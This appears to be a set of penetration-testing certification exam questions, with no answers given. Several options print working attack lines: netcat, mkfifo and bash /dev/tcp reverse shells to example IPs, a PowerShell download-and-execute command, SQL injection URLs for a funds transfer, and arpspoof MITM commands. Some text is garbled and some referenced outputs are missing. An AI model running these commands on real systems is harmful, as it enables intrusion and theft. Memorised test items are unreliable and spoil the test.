Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1`);Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?

A. Set the execution policy.

B. Execute a remote script.

C. Run an encoded command.

D. Instantiate an object.

A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake. Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

A. Karma attack

B. Deauthentication attack

C. Fragmentation attack

D. SSDI broadcast flood

A penetration tester has discovered through automated scanning that a Tomcat server allows for the use of default credentials. Using default credentials, the tester is able to upload WAR files to the server. Which of the following is the MOST likely post-exploitation step?

A. Upload a customized /etc/shadow file.

B. Monitor network traffic

C. Connect via SSH using default credentials.

D. Install web shell on the server.

A penetration tester has been assigned to perform an external penetration assessment of a company. Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

A. Wait outside of the company’s building and attempt to tailgate behind an employee.

B. Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.

C. Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

D. Search social media for information technology employees who post information about the technologies they work with.

E. Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

A. HKEY_CLASSES_ROOT

B. HKEY_LOCAL_MACHINE

C. HKEY_CURRENT_USER

D. HKEY_CURRENT_CONFIG

A penetration tester successfully exploits a DMZ server that appears to be listening on an outbound port. The penetration tester wishes to forward that traffic back to a device. Which of the following are the BEST tools to use for this purpose? (Choose two.)

A. Tcpdump

B. Nmap

C. Wireshark

D. SSH

E. Netcat

F. Cain and Abel

During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command: c: creditcards.db>c:winitsystem32calc.exe:creditcards.db
Which of the following file system vulnerabilities does this command take advantage of?

A. Hierarchical file system

B. Alternate data streams

C. Backdoor success

D. Extended file system

A client is asking a penetration tester to evaluate a new web application for availability. Which of the following types of attacks should the tester use?

A. TCP SYN flood

B. SQL injection

C. XSS

D. XMAS scan

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

A. Stack pointer register

B. Index pointer register

C. Stack base pointer

D. Destination index register

Which of the following would be the BEST for performing passive reconnaissance on a target's external domain?

A. Peach

B. CeWL

C. OpenVAS

D. Shodan

After establishing a shell on a target system, Joe, a penetration tester is aware that his actions have not been detected. He now wants to maintain persistent access to the machine. Which of the following methods would be MOST easily detected?

A. Run a zero-day exploit.

B. Create a new domain user with a known password.

C. Modify a known boot time service to instantiate a call back.

D. Obtain cleartext credentials of the compromised user.

Which of the following BEST explains why it is important to maintain confidentially of any identified findings when performing a penetration test?

A. Penetration test findings often contain company intellectual property

B. Penetration test findings could lead to consumer dissatisfaction if made public.

C. Penetration test findings are legal documents containing privileged information.

D. Penetration test findings can assist an attacker in compromising a system.

A client has voiced concern about the number of companies being breached by remote attackers, who are looking for trade secrets. Which of the following BEST describes the type of adversaries this would identify?

A. Script kiddies

B. APT actors

C. Insider threats

D. Hacktivist groups

A penetration tester is reviewing the following output from a wireless sniffer:
 
Which of the following can be extrapolated from the above information?

A. Hardware vendor

B. Channel interference

C. Usernames

D. Key strength

Which of the following commands starts the Metasploit database?

A. msfconsole

B. workspace

C. msfvenom

D. db_init

E. db_connect

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

A. nc 192.168.1.5 44444

B. nc -nlvp 44444 -e /bin/sh

C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f

D. nc -e /bin/sh 192.168.1.5 44444

E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f

F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f

Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?

A. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=False&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’גˆ’&amount=200

B. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=False&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’ &amount=200

C. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=True&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’ גˆ’&amount=200

D. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846¬ify=True&creditaccount=’AND 1=1 AND select username from testbank.custinfo where username like ‘Joe’ גˆ’&amount=200

A penetration tester is reviewing a Zigbee implementation for security issues. Which of the following device types is the tester MOST likely testing?

A. Router

B. IoT

C. WAF

D. PoS

A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?

A. The physical location and network ESSIDs to be tested

B. The number of wireless devices owned by the client

C. The client’s preferred wireless access point vendor

D. The bands and frequencies used by the client’s devices

Joe, a penetration tester, has received basic account credentials and logged into a Windows system. To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

A. LSASS

B. SAM database

C. Active Directory

D. Registry

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

A. perl -e ‘use SOCKET’; $i='<SOURCEIP>; $p=&apos;443;

B. ssh superadmin@ -p 443

C. nc -e /bin/sh 443

D. bash -i >& /dev/tcp//443 0>&1

Which of the following can be used to perform online password attacks against RDP?

A. Hashcat

B. John the Ripper

C. Aircrack-ng

D. Ncrack

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal

B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm

C. From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 ג€xhost+; xtermג€

D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000

A penetration tester discovers an anonymous FTP server that is sharing the C:drive. Which of the following is the BEST exploit?

A. Place a batch script in the startup folder for all users.

B. Change a service binary location path to point to the tester’s own payload.

C. Escalate the tester’s privileges to SYSTEM using the at.exe command.

D. Download, modify, and reupload a compromised registry to obtain code execution.

A penetration tester runs the following on a machine:
 
Which of the following will be returned?

A. 1

B. 3

C. 5

D. 6

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:
IP: 192.168.1.20 -
NETMASK: 255.255.255.0 -
DEFAULT GATEWAY: 192.168.1.254 -
DHCP: 192.168.1.253 -
DNS: 192.168.10.10, 192.168.20.10
Which of the following commands should the malicious user execute to perform the MITM attack?

A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20

B. arpspoof -t 192.168.1.20 192.168.1.254

C. arpspoof -c both -t 192.168.1.20 192.168.1.253

D. arpspoof -r -t 192.168.1.253 192.168.1.20

If a security consultant comes across a password hash that resembles the following: b117525b345470c29ca3d8ae0b556ba8
Which of the following formats is the correct hash type?

A. Kerberos

B. NetNTLMv1

C. NTLM

D. SHA-1

A penetration tester directly connects to an internal network. Which of the following exploits would work BEST for quick lateral movement within an internal network?

A. Crack password hashes in /etc/shadow for network authentication.

B. Launch dictionary attacks on RDP.

C. Conduct a whaling campaign.

D. Poison LLMNR and NBNS requests.

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

A. MAC address of the client

B. MAC address of the domain controller

C. MAC address of the web server

D. MAC address of the gateway

During a vulnerability assessment, the security consultant finds an XP legacy system that is running a critical business function. Which of the following mitigations is BEST for the consultant to conduct?

A. Update to the latest Microsoft Windows OS.

B. Put the machine behind the WAF.

C. Segment the machine from the main network.

D. Disconnect the machine.

A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes. Which of the following is the BEST way to approach the project?

A. Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities.

B. Review the firewall configuration, followed by a targeted attack by a read team.

C. Perform a discovery scan to identify changes in the network.

D. Focus on an objective-based approach to assess network assets with a red team.

A penetration tester is checking a script to determine why some basic math errors are persisting. The expected result was the program outputting `True`.
 
Given the output from the console above, which of the following explains how to correct the errors in the script? (Choose two.)

A. Change ‘fi’ to ‘Endlf’.

B. Remove the ‘let’ in front of ‘dest=5+5’.

C. Change the ‘=’ to ‘-eq’.

D. Change ‘source’ and ‘dest’ to ג€$sourceג€ and ג€$destג€.

E. Change ‘else’ to ‘elif’.

A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5.
Which of the following commands will test if the VPN is available?

A. fpipe.exe -1 8080 -r 80 100.170.60.5

B. ike-scan -A -t 1 –sourceip=spoof_ip 100.170.60.5

C. nmap -sS -A -f 100.170.60.5

D. nc 100.170.60.5 8080 /bin/sh

A penetration tester has performed a pivot to a new Linux device on a different network. The tester writes the following command: for m in {1..254..1};do ping -c 1 192.168.101.$m; done
Which of the following BEST describes the result of running this command?

A. Port scan

B. Service enumeration

C. Live host identification

D. Denial of service

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

A. Disable the network port of the affected service.

B. Complete all findings, and then submit them to the client.

C. Promptly alert the client with details of the finding.

D. Take the target offline so it cannot be exploited by an attacker.

Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe is looking for a method that will enable him to enter the building during business hours or when there are no employees on-site. Which of the following would be the MOST effective in accomplishing this?

A. Badge cloning

B. Lock picking

C. Tailgating

D. Piggybacking

Which of the following BEST protects against a rainbow table attack?

A. Increased password complexity

B. Symmetric encryption

C. Cryptographic salting

D. Hardened OS configurations

A security analyst has uncovered a suspicious request in the logs for a web application. Given the following URL: http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswd
Which of the following attack types is MOST likely to be the vulnerability?

A. Directory traversal

B. Cross-site scripting

C. Remote file inclusion

D. User enumeration

During an internal penetration test, several multicast and broadcast name resolution requests are observed traversing the network. Which of the following tools could be used to impersonate network resources and collect authentication requests?

A. Ettercap

B. Tcpdump

C. Responder

D. Medusa

After a recent penetration test, a company has a finding regarding the use of dictionary and seasonal passwords by its employees. Which of the following is the
BEST control to remediate the use of common dictionary terms?

A. Expand the password length from seven to 14 characters.

B. Implement password history restrictions.

C. Configure password filters/

D. Disable the accounts after five incorrect attempts.

E. Decrease the password expiration window.

A penetration tester has been hired to perform a penetration test for an organization. Which of the following is indicative of an error-based SQL injection attack?

A. a=1 or 1ג€”ג€”

B. 1=1 or bג€”ג€”

C. 1=1 or 2ג€”ג€”

D. 1=1 or aג€”ג€”

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

A. Discovery scan

B. Stealth scan

C. Full scan

D. Credentialed scan

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

A. arpspoof

B. nmap

C. responder

D. burpsuite

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1
Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?

A. nc -nlvp 443

B. nc 10.2.4.6. 443

C. nc -w3 10.2.4.6 443

D. nc -e /bin/sh 10.2.4.6. 443

Which of the following commands would allow a penetration tester to access a private network from the Internet in Metasploit?

A. set rhost 192.168.1.10

B. run autoroute -s 192.168.1.0/24

C. db_nmap -iL /tmp/privatehosts.txt

D. use auxiliary/server/socks4a

A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.
The tester runs the following command:
nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130
Which of the following BEST describes why multiple IP addresses are specified?

A. The network is subnetted as a/25 or greater, and the tester needed to access hosts on two different subnets.

B. The tester is trying to perform a more stealthy scan by including several bogus addresses.

C. The scanning machine has several interfaces to balance the scan request across at the specified rate.

D. A discovery scan is run on the first set of addresses, whereas a deeper, more aggressive scan is run against the latter host.

Given the following script:
 
Which of the following BEST describes the purpose of this script?

A. Log collection

B. Event collection

C. Keystroke monitoring

D. Debug message collection

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A. Sample SOAP messages

B. The REST API documentation

C. A protocol fuzzing utility

D. An applicable XSD file

An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email in hopes the Chief Executive Officer (CEO) logs in to obtain the CEO's login credentials. Which of the following types of attacks is this an example of?

A. Elicitation attack

B. Impersonation attack

C. Spear phishing attack

D. Drive-by download attack

A vulnerability scan report shows what appears to be evidence of a memory disclosure vulnerability on one of the target hosts. The administrator claims the system is patched and the evidence is a false positive. Which of the following is the BEST method for a tester to confirm the vulnerability exists?

A. Manually run publicly available exploit code.

B. Confirm via evidence of the updated version number.

C. Run the vulnerability scanner again.

D. Perform dynamic analysis on the vulnerable service.